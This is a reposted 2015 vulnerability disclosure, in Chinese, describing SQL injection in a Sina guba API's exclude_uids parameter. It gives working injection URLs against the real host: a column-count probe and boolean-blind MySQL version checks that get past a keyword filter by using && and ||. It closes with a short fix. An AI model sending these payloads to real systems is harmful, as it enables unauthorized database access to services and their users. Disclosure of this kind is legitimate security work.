记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

新浪某业务SQL注射漏洞(过滤规则不全)

2015-05-16 20:25

漏洞URL:

http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085&num=6



漏洞参数为:exclude_uid



http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085%29%20order%20by%208%23&num=6



该条查询返回字段数为6。



该参数禁止了union、select、and、但是没有禁止or、||、&&,提交都会提示:



{"result":{"status":{"code":403,"msg":"非法字符 "},"data":[]}}



没有select也就不可以跨表查询了。



Mysql是不是大于5的?



http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085%29%20%26%26%20version%28%29%20%3E5%23&num=6



是的



Mysql是不是小于5的?



http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085%29%20%26%26%20version%28%29%20%3C5%23&num=6



不是的。



漏洞证明:

http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085%29%20%26%26%20version%28%29%20%3E5%23&num=6



是的



Mysql是不是小于5的?



http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085%29%20%26%26%20version%28%29%20%3C5%23&num=6



不是的。

修复方案:

先explode再intval。


知识来源: www.wooyun.org/bugs/wooyun-2015-0105195

阅读:109729 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“新浪某业务SQL注射漏洞(过滤规则不全)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云

本页关键词